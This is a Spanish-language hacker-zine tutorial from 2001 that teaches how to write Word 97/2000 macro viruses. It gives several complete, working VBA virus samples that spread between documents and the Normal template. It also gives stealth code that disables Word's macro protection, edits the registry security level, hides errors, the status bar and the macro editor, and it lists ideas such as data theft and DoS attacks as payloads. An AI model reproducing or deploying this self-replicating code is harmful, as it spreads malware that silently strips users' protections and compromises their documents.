Copy Link
Add to Bookmark
Report
3x03: Guia de Virus Macro Word (Para Word v.97 y v.2000)
-[ 3x03.txt ]----------------------------------------------------------------
-[ Guia de Virus Macro Word (Para Word
v.97 y v.2000) ]----------[ LiteSYS ]-
----------------------------------------------------[ liteno2@softhome.net ]-
Introduccion:
ñññññññññññññ
Si leyeron el titulo en esta
pequeña guia explicare como se programa un
virus macro de Word, versiones 97 y
2000 hasta estos dias son las
compatibles con este tipo de virus, los correspondientes a versiones
anteriores a la SR-1 son programados de una manera diferente y no seran
explicados ya que ademas estan obsoletos.
Conocimientos
avanzados de VisualBasic son necesarios, y antes de nada
habria que tomar varias
cosas en cuenta antes de empezar a leer la guia:
(a) Los virus macro son algo
realmente trivial, faciles de escribir ya
que estan hechos en un lenguaje de
nivel altisimo (VB). Se debe tener en
cuenta que compararlos con los escritos en
ensamblador son relativamente
nada, pero son un buen comienzo para iniciarse en
el mundo de los virus
y luego "saltar" a niveles superiores como ensamblador u
algun otro
lenguaje de alto nivel.
(b) En esta guia no se mostrara ni se explicara como escribir codigo
destructivo, los virus destructivos en estos dias
carecen de sentido ya
que se han visto las (desgraciadas) consecuencias de la
destruccion de
informacion.
(c) Se original a la hora de escribir un virus,
colocale codigo que en
realidad sean interesantes para otras personas. Esto lo
digo debido a
que existen infinitas cantidades de virus de macro que solamente
infectan y mas nada, como no son originales no se abriran paso en llamar
la
atencion a otros escritores de virus. Un ejemplo de virus realmente
original
puede ser Caligula por Opic, que robaba llaves PGP del usuario
infectado, una
excelente idea, o el algoritmo de Worm de E-Mail de
Melissa.
(d) Ten en cuenta
que las capacidades de que un virus macro salga de una
maquina y se reproduzca
hacia otras partes se ha visto frustrada desde
la version SR-1 de Word, debido a
que cada vez que se carga un documento
aparece un dialogo advirtiendo al usuario
de que el documento posee
macros, esto puede ser eliminado pero luego de la
ejecucion del virus,
por lo cual el usuario tendria que haber aceptado la
ejecucion de macros
primero.
(e) Manifiesto que no cargare con ninguna
responsabilidad por algun uso
que se le de a los conocimientos explicados en
este articulo. Ahora que
he dicho lo primero que tenia que decir, creo que seria
bueno ir al
grano. Carga tu Microsoft Word (ya dije que debe ser una version >
97) y
luego presiona ALT-F11 (si no sirve busca en: Herramientas ==> Macro ==>
Editor de Visual Basic). Ahi veras varias cosas, primero que nada en el
dialogo
izquierdo veras la plantilla Normal y el Documento Activo,
familiarizate con la
interfaz del editor de VB. Veamos la logica de la
infeccion del virus de macro,
en Word, varias subrutinas se ejecutan
bajo ciertos "eventos", como lo son:
Sub
AutoOpen() : Cuando se abre un documento.
Sub AutoClose() : Cuando se cierra un
documento.
Sub Document_Open() : Cuando se abre un documento.
Sub
Document_Close() : Cuando se cierra un documento.
Sub ViewVBCode() : Cuando se
carga el editor de Visual Basic (ALT-F11).
Sub ToolsMacro() : Cuando se carga la
lista de macros (ALT-F8).
Entonces, logico es que se utilizan AutoOpen(),
AutoClose(),
Document_Open() o Document_Close() para colocar el codigo,
entonces, al
cargarse un documento infectado este revisa si la plantilla normal
esta
infectada, si lo esta, entonces continua. Si no lo esta, copia su codigo
a
esta, entonces queda el virus residente en la plantilla normal, por lo
cual cada
vez que se de uno de los eventos anteriormente mencionados
esta copiara su
codigo a todos los documentos que se abran.
METODO DE INFECCION POR MODULOS
-------------------------------
Consiste en añadir su codigo a traves de modulos de codigo, para ver
como va un modulo metete en Insertar ==> Modulo, ahi
puedes colocar
codigo.
Entonces, este consiste en copiar el modulo de la
plantilla normal al
documento y viceversa cuando no se este infectado. Veamos el
codigo del
virus de modulo mas sencillo posible.
'Ejemplo de virus macro de Word #1 - Infeccion
por Modulos LiteSys '
Sub AutoOpen()
On Error Resume Next
For A = 1 To ActiveDocument.VBProject.VBComponents.Count
If
(ActiveDocument.VBProject.VBComponents(A).Name = "Virus") Then Doc = True
Next
For A = 1 To NormalTemplate.VBProject.VBComponents.Count
If
(NormalTemplate.VBProject.VBComponents(A).Name = "Virus") Then Nor = True
Next
If (Doc <> True) Then NormalTemplate.VBProject.VBComponents("Virus").Export
("C:\virus.sys")
ActiveDocument.VBProject.VBComponents.Import ("C:\virus.sys")
Kill ("C:\virus.sys")
End If
If (Nor <> True) Then
ActiveDocument.VBProject.VBComponents("Virus").Export ("C:\virus.sys")
NormalTemplate.VBProject.VBComponents.Import ("C:\virus.sys")
Kill
("C:\virus.sys") End If
End Sub
Oh, eso fue
demasiado...
'Ejemplo de virus macro de Word
LiteSys'
Sub AutoOpen() On Error Resume Next
Aqui empieza el codigo, como dije anteriormente, con AutoOpen(). El
codigo de la
cuarta linea se coloca para que VBA no reporte errores,
asi evitar "sospechas"
del usuario.
For A = 1 To
ActiveDocument.VBProject.VBComponents.Count
If
(ActiveDocument.VBProject.VBComponents(A).Name = "Virus") Then Doc = True
Next
Se hace un ciclo desde el primero hasta el ultimo de los modulos de
codigo del documento activo. ActiveDocument = Documento Activo.
VBProject = El "proyecto" correspondiente a VBA. VBComponents = Objeto
referente a todos los modulos. Count = Cantidad de modulos. En la
segunda linea
si el nombre del modulo correspondiente al momento actual
del ciclo se llama
"Virus" coloca la variable booleana "Doc" como
verdadera. Entonces, lo que hace
esta parte del codigo es revisar si
existe el modulo "Virus" en el documento, es
decir, si el documento
esta infectado.
For A =
1 To NormalTemplate.VBProject.VBComponents.Count
If
(NormalTemplate.VBProject.VBComponents(A).Name = "Virus") Then Nor = True
Next
Esta parte de codigo hace lo mismo que el
anterior pero con la plantilla
normal, para revisar si la misma esta infectada.
Notese que "NormalTemplate" se refiere a la plantilla normal. En la
segunda
linea si existe el modulo coloca la variable booleana "Nor"
como verdadera.
If (Doc <> True) Then
NormalTemplate.VBProject.VBComponents("Virus").Export ("C:\virus.sys")
ActiveDocument.VBProject.VBComponents.Import ("C:\virus.sys")
Kill
("C:\virus.sys") End If
El codigo anterior se
ejecuta si la variable booleana "Doc" no es
verdadera, es decir, si es falsa, lo
cual significa que el documento
activo no esta infectado. En ese caso, se
exporta el modulo "Virus" de
la plantilla Normal al archivo C:\virus.sys, y en
la tercera linea se
importa desde el documento activo desde ese mismo archivo.
Por ultimo se borra el archivo C:\virus.sys pues no es necesario.
If (Nor <> True) Then
ActiveDocument.VBProject.VBComponents("Virus").Export ("C:\virus.sys")
NormalTemplate.VBProject.VBComponents.Import ("C:\virus.sys")
Kill
("C:\virus.sys")
End If
End Sub
Totalmente
similar al anterior, pero sucede si la plantilla normal no
esta infectada, por
lo cual se exportara el modulo "Virus" del
documento activo al archivo
C:\virus.sys y se importara desde la
plantilla normal. Por ultimo se borra el
archivo C:\virus.sys y termina
el virus. Por supuesto que este codigo puede ser
mucho mas optimizado,
como por ejemplo en este codigo:
'Ejemplo de virus macro de Word #2 - Infeccion
por Modulos 'LiteSys
Sub AutoOpen()
On Error Resume
Next
VBE.ActiveVBProject.VBComponents("Virus").Export "C:\virus.sys"
For A = 1 To
ActiveDocument.VBProject.VBComponents.Count
If
(ActiveDocument.VBProject.VBComponents(A).Name = "Virus") Then Doc = True
Next
For A = 1 To NormalTemplate.VBProject.VBComponents.Count
If
(NormalTemplate.VBProject.VBComponents(A).Name = "Virus") Then Nor = True
Next
If (Doc <> True) Then ActiveDocument.VBProject.VBComponents.Import
("C:\virus.sys")
End If
If (Nor <> True) Then
NormalTemplate.VBProject.VBComponents.Import ("C:\virus.sys")
End If
Kill
("C:\virus.sys") End Sub
Este funciona de una
manera totalmente similar solamente que esta un
poco mas optimizado, solamente
voy a explicar una parte de codigo
porque creo que lo demas habla por si solo.
VBE.ActiveVBProject.VBComponents("Virus").Export "C:\virus.sys"
Este es el objeto ActiveVBProject, se refiere
al Proyecto VBA del cual
se este ejecutando codigo en el momento, por lo cual
puede ser tanto el
de la plantilla normal como el del documento activo. Ahora
bien, existe
tambien la posibilidad de "Setear" los objetos para dificultar la
deteccion del virus por parte de los detectores antivirus heuristicos,
ahorrarnos codigo y darle al virus una apariencia mas "profesional",
como va con
el siguiente virus, que es el mismo anterior.
'Ejemplo de virus macro de Word #3 - Infeccion por Modulos 'LiteSys
Sub
AutoOpen()
On Error Resume
Next
Set ProyActivo =
VBE.ActiveVBProject.VBComponents
Set DocActivo =
ActiveDocument.VBProject.VBComponents
Set PlaNormal =
NormalTemplate.VBProject.VBComponents
Archivo = "C:\virus.sys"
ProyActivo("Virus").Export (Archivo)
For A = 1 To DocActivo.Count
If
(DocActivo(A).Name = "Virus") Then
Doc = True Next For A = 1 To PlaNormal.Count
If (PlaNormal(A).Name = "Virus") Then Nor = True
Next
If (Doc <> True) Then
DocActivo.Import (Archivo) End If If (Nor <> True) Then PlaNormal.Import
(Archivo)
End If
Kill (Archivo)
End Sub
Explicare un poco (solo un poco, porque habla por si solo) este codigo.
Set ProyActivo =
VBE.ActiveVBProject.VBComponents
Set DocActivo =
ActiveDocument.VBProject.VBComponents
Set PlaNormal =
NormalTemplate.VBProject.VBComponents
Archivo = "C:\virus.sys"
Aqui hacemos el "Seteo", por lo cual
ProyActivo apunta al
ActiveVBProject, DocActivo apunta al VBProject del
documento activo y
PlaNormal apunta al VBProject de la plantilla normal, asi que
todas
las referencias que van despues se dan a estos en vez de darse
directamente al objeto. La cuarta linea hace algo parecido pero con un
string,
me refiero al archivo de exportacion de los modulos, asi
tambien ahorramos un
poco de codigo.
METODO DE INFECCION POR CLASS OBJECT O THISDOCUMENT
---------------------------------------------------
Si mas de uno se habra
fijado existe un objeto tanto en la plantilla
normal como en el documento
llamado ThisDocument. Este es el Class
Object, un objeto en el cual podemos
colocar codigo de igual manera que
podemos con modulos, por lo cual abre las
puertas a otro metodo de
infeccion y la ventaja de que las macros en este no se
muestran en la
lista de macros al presionar ALT-F8. El metodo fue inventado por
VicodinES, miembro del grupo CodeBreakers y The Narcotic Network.
Anteriormente
se pensaba que este metodo no era lo suficientemente
eficiente debido a que si
existen dos subrutinas o funciones de igual
nombre, una en el documento activo y
la otra en la plantilla normal, el
codigo no correra por lo que habia que
utilizar el metodo ReplaceLine
del CodeModule para cambiarle el nombre a la
subrutina o funcion, algo
muy engorroso. Pero la solucion fue mas tonta de lo
que se pensaba, en
vez de la sintaxis comun de: Sub Yuca() End Sub -o- Function
Loca() as
String End Function Debemos colocarla de la siguiente forma: Private
Sub Yuca() End Sub -o- Private Function Loca() as String End Function
Otra cosa
que hay que tener en cuenta, en este metodo de infeccion
debemos utilizar los
hooks Document_Open() o Document_Close() en vez de
AutoOpen() o AutoClose().
Ahora bien, escribir un virus para este es algo parecido, con algunas
variaciones. Como veremos en el codigo, entra en juego un nuevo objeto:
El
CodeModule, pero antes de entrar con esto, es mejor mostrar un
codigo.
'Ejemplo de virus macro de Word #4 - Infeccion
por '
Class Object Private
Sub Document_Open()
On Error Resume
Next
If
(ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines = 0) Then
NormalTemplate.VBProject.VBComponents(1).Export ("C:\virus.sys")
ActiveDocument.VBProject.VBComponents(1).CodeModule.AddFromFile ("C:\virus.sys")
ActiveDocument.VBProject.VBComponents(1).CodeModule.DeleteLines 1, 4
End If
If
(NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines = 0) Then
ActiveDocument.VBProject.VBComponents(1).Export ("C:\virus.sys")
NormalTemplate.VBProject.VBComponents(1).CodeModule.AddFromFile ("C:\virus.sys")
NormalTemplate.VBProject.VBComponents(1).CodeModule.DeleteLines 1, 4
End If
Kill
("C:\virus.sys")
End Sub
Como podemos
apreciar, la cantidad de codigo utilizado aqui es mucho
menor, incluso si
"Seteamos" los objetos ahorraremos una cantidad
magnifica de codigo, aunque creo
que se me olvida explicar el codigo...
If
(ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines = 0) Then
NormalTemplate.VBProject.VBComponents(1).Export ("C:\virus.sys")
ActiveDocument.VBProject.VBComponents(1).CodeModule.AddFromFile ("C:\virus.sys")
ActiveDocument.VBProject.VBComponents(1).CodeModule.DeleteLines 1, 4
End If
Este codigo se ejecuta con la condicion de que
la cantidad de lineas en
el Class Object del documento activo sea igual a cero
(tengamos en
cuenta que el Class Object siempre es el primer VBComponent del
proyecto), este metodo no me convence porque puede que en ese Class
Object
exista otro codigo y simplemente no se reproduzca, por lo que
luego colocare
otro codigo. Siguiendo con el codigo, en la segunda linea
se exporta el codigo
desde la plantilla normal a C:\virus.sys. En la
tercera linea se importa el
codigo desde C:\virus.sys al Class Object
del documento activo, este metodo
tampoco me convence por lo que
colocare luego otro codigo. La cuarta linea
elimina las primeras cuatro
lineas, por que? porque cuando se importa se añaden
cuatro lineas que
provocarian un error:
VERSION 1.0 CLASS BEGIN MultiUse = -1 'True End
Por eso los eliminamos. Siguiendo con el
codigo...
If (NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines = 0) Then
ActiveDocument.VBProject.VBComponents(1).Export ("C:\virus.sys")
NormalTemplate.VBProject.VBComponents(1).CodeModule.AddFromFile ("C:\virus.sys")
NormalTemplate.VBProject.VBComponents(1).CodeModule.DeleteLines 1, 4
End If
Esto hace totalmente LO MISMO que el anterior pero con la plantilla
normal, no creo que sea necesario explicarlo ya que funciona totalmente
igual. Como decia anteriormente, los metodos del virus anterior no me
convencen del todo y creo que pueden dificultar la reproduccion del
virus, por lo cual colocare uno que en realidad yo pienso funciona
mejor.
'Coder 'Ejemplo de virus macro de Word #5 - Infeccion por
Class Object Private
Sub Document_Open()
If
(ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 1) <> "'Coder")
Then Twinkie = NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines
Yuppie = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(1, Twinkie)
ActiveDocument.VBProject.VBComponents(1).CodeModule.AddFromString Yuppie
End If
If (NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(1, 1) <> "'Coder") Then
Twinkie = ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
Yuppie = ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(1, Twinkie)
NormalTemplate.VBProject.VBComponents(1).CodeModule.AddFromString Yuppie
End If
End Sub
Finalmente he aqui los metodos que me
gusta utilizar en mis virus macro.
Mas rapido, y si cuentas el numero de lineas
es el mismo.. y tambien se
puede optimizar mucho el codigo, como hare en el
proximo virus que
colocare... Puede que resulte un poco dificil de entender
porque no
existen optimizaciones de tipo Set y cosas asi, pero lo mejor de este
metodo es su rapidez ya que no tienes que manipular ningun archivo.
Explicare el
codigo parte por parte para asi entenderlo todos.
'Coder
'Coder es nuestra "Marca de Infeccion", la utilizamos para saber si el
virus
existe en la plantilla normal o el documento activo, por lo cual
tenemos mejores
posibilidades de infectar, entonces, siguiendo con el
codigo veras como
utilizamos dicha marca de infeccion.
If
(ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 1) <> "'Coder")
Then
Twinkie = NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines
Yuppie = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(1, Twinkie)
ActiveDocument.VBProject.VBComponents(1).CodeModule.AddFromString Yuppie
End If
El codigo anterior se ejecuta si en el class
object del documento activo
su primera linea no es igual a "'Coder", nuestra marca de infeccion. En
la segunda linea podemos apreciar que la variable Twinkie
es igual a el
numero de lineas del class object de la plantilla normal. En la
tercera
linea la variable Yuppie es igual a todo el codigo del class object de
la plantilla normal desde la primera linea hasta Twinkie, por lo cual
Yuppie
representa todo el codigo del class object de la plantilla. Por
ultimo en la
cuarta linea importamos el codigo desde Yuppie hasta el
class object del
documento activo, como dije anteriormente, sin utilizar
archivos! mas rapido,
por supuesto. Ahora vayamos a otro codigo, que es
el mismo anterior pero un poco
mejor optimizado.
'Virus
Private Sub
Document_Open()
On Error Resume
Next
Set Doc =
ActiveDocument.VBProject.VBComponents(1).CodeModule
Set Pla =
NormalTemplate.VBProject.VBComponents(1).CodeModule
Set Yop =
VBE.ActiveVBProject.VBComponents(1).CodeModule
Codigo = Yop.Lines(1,
Yop.CountOfLines)
If (Doc.Lines(1, 1) <> "'Virus") Then
Doc.AddFromString Codigo
If (Pla.Lines(1, 1) <> "'Virus") Then
Pla.AddFromString Codigo
End Sub
Me creas o no eso es todo un virus. Como veras la marca de infeccion es
"Virus" y a mi propio juicio creo que lo optimice bien.
Las
explicaciones van, aunque no creo que sean muy necesarias eh? =P.
Set Doc =
ActiveDocument.VBProject.VBComponents(1).CodeModule
Set Pla =
NormalTemplate.VBProject.VBComponents(1).CodeModule
Set Yop =
VBE.ActiveVBProject.VBComponents(1).CodeModule
Codigo = Yop.Lines(1,
Yop.CountOfLines)
Colocamos a Doc igual al
modulo codigo del class object del documento
activo. Pla es igual al modulo
codigo del class object de la plantilla
normal. Yop es igual al modulo codigo
del class object del proyecto
activo.
Y Codigo es igual a todo el codigo del
class object del proyecto activo.
If
(Doc.Lines(1, 1) <> "'Virus") Then
Doc.AddFromString Codigo
If (Pla.Lines(1, 1) <> "'Virus") Then
Pla.AddFromString Codigo
Revisamos si la primera linea del documento activo es igual a nuestra
marca de
infeccion, si no lo es importamos desde la variable "Codigo"
anteriormente
declarada. Luego hace lo mismo con la plantilla Normal.
Existe otro metodo para
revisar si el documento activo o la plantilla
normal estan infectados, que
consiste en cambiarle el nombre al Class
Object y utilizar dicho nombre como
marca de infeccion, esto se logra
a traves de la propiedad "Name", la cual se
encuentra en:
ActiveDocument.VBProject.VBComponents(1).Name
NormalTemplate.VBProject.VBComponents(1).Name
Esta propiedad es totalmente
modificable y como dije anteriormente puede
ser usada tambien como marca de
infeccion. Bien, creo que ha sido todo
por parte de la infeccion a traves del
Class Object.
ALGUNAS COSAS QUE COLOCARLE A LOS VIRUS
---------------------------------------
Siempre ha resultado buena la idea de
guardar el documento activo
despues de infectar, de manera que asi se guarden
los documentos que
solo son abiertos para "ser vistos".
*** NOTA: No vayas a
colocar esta linea de codigo cuando implementes en
tu virus tecnicas como
polimorfismo o encriptamiento, por que
(por lo menos en el pote de maquina ese
que tengo yo) el Word
provoca un error... El codigo es simple, solo tienes que
colocar despues de la infeccion lo siguiente:
ActiveDocument.SaveAs ActiveDocument.FullName
Una buena idea de stealth es eliminar la proteccion de virus, esto lo
podemos
hacer sencillamente colocando el codigo:
Options.VirusProtection = False
Este codigo
solamente funciona con la version '97, pero la 2000 tenemos
que hacer otras
cosas, editar en el registro de sistema, lo cual podemos
lograr a traves de:
System.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security","Level") = "1"
Otra cosa conveniente para
hacer es controlar los errores, cuando
termines de escribir tu virus nunca
olvides esto, si no quieres que
tu usuario se de cuenta:
On Error Resume Next
Otro buen codigo stealth es el eliminar la
barra de estado, pues en esta
muestra cuando se esta guardando el documento,
cosa que no queremos que
el usuario vea, por lo cual simplemente:
Application.DisplayStatusBar = False
Como se me pueden olvidar los famosisimos
Stealth Hooks? pues, como
viste una de las subrutinas mostradas anteriormente,
podemos utilizarlas
para que cuando el usuario pida la lista de macros o corra
el editor de
visual basic simplemente no haga nada.
*** NOTA: Esto no funciona
en el modo "Private" de la Class Infection,
por lo cual tenemos si lo queremos
usar en un Class debemos
utilizar el metodo ReplaceLine.
Sub ViewVBCode()
End Sub
Sub ToolsMacro()
Enb Sub
Existen otras tecnicas de stealth mucho
mas avanzadas, por ejemplo la de
eliminar el codigo mientras el dialogo de
macros este activo, pero creo
que esto es una guia introductoria no mas.
PAYLOAD
-------
Otro codigo que nunca dejamos dejar pasar es el payload! el payload no
es mas que la manifestacion de la existencia del virus para con el
usuario del
virus, como dije anteriormente no voy a colocar payloads
destructivos, solamente
una introduccion... lo demas veran como lo
colocan ustedes. Para hacer que el
payload se ejecute en un dia, fecha,
año u hora determinados tenemos varias
funciones:
Day(Now) : Devuelve el dia actual.
WeekDay(Now) : Devuelve el dia de
la semana actual.
Month(Now) : Devuelve el mes actual.
Hour(Now) : Devuelve la
hora actual.
Minute(Now) : Devuelve el minuto de la hora actual.
Year(Now) :
Devuelve el año actual.
Existen muchas posibilidades para tus payloads, puedo
mencionar varias
ideas:
- Cajitas de Mensaje
- Contenido del Documento
- Nombre del usuario registrado
- Asistente de Word (ese maldito clip que aparece ahi)
- El registro del sistema (puedes cambiar TODO en windoze!)
- Wallpapers!
- Robo
de informacion
- Ataques DoS a websites fascistas y/o estupidos (onda
planetachurbe o
loquemierda) - Y muchas cosas mas! las posibilidades son
muchas...
-- Cajitas de Mensaje --
Tomemos un ejemplo que el dia 15 de cada mes
muestre una caja de mensaje
diciendo "Hola, soy tu nuevo amigo"
con:
If ( Day(Now) = 15 ) Then MsgBox "Hola, soy tu
nuevo amigo"
End If
-- Contenido del Documento
--
Que tal si a las ocho de la noche coloque al final del documento un
texto?
If (Hour(Now) = 8) Then
ActiveDocument.Content
= ActiveDocument.Content + "Apaga el computador y vete a la cama!"
End If
-- Nombre del Usuario Registrado --
Como
quedaria si cada Martes 13 cambiamos el nombre del usuario
registrado en Office?
If (WeekDay(Now) = 3) And (Day(Now) = 13) Then
Application.UserName = "TE VERE EN EL INFIERNO"
End If
Sin tampoco dejar de mencionar otros Add-Ons
que le podemos colocar a
tu virus para hacerlo mas interesante, menos detectable
y mas potente:
- Encriptacion
- Polimorfismo
- Stealth Avanzado
- Infeccion a otros miembros de la familia office (Cross-Infection)
- Hacer un dropper para
colocar otro virus en el sistema
- Worms (IRC, E-Mail, etc...)
- Muchas cosas
mas!
OUTRO
------
Creo que este texto ha finalizado, puede que escriba otra parte
con
contenidos mas avanzados, puede que no.. bueno, me despido de todos
ustedes
y espero que este pequeño documento no les haya ayudado en nada.
Si desean
contactarme para cualquier cosa seria (no para mariquerias, no
tengo tiempo para
leer y mucho menos contestar) pueden llegar por ahi en
el irc en undernet o en
dalnet o a traves de mi mail: liteno2@softhome.net
Sin nada mas que decir...
LiteSys. Venezuela - (c) 2001 Marañeros, C.A.
--EOF--
